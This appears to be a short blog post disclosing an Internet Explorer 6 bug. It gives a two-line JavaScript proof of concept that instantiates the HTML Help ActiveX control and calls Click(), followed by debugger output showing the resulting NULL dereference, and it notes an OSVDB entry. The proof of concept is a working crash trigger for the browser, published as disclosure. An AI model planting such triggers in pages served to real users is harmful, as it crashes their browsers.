The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the Click() method on this object, without first initializing the URL, will trigger a NULL dereference. This bug was submitted by Alex F.
var a = new ActiveXObject("Internet.HHCtrl.1");
a.Click();
Demonstration
eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE HTML Help COM Object Click Method NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment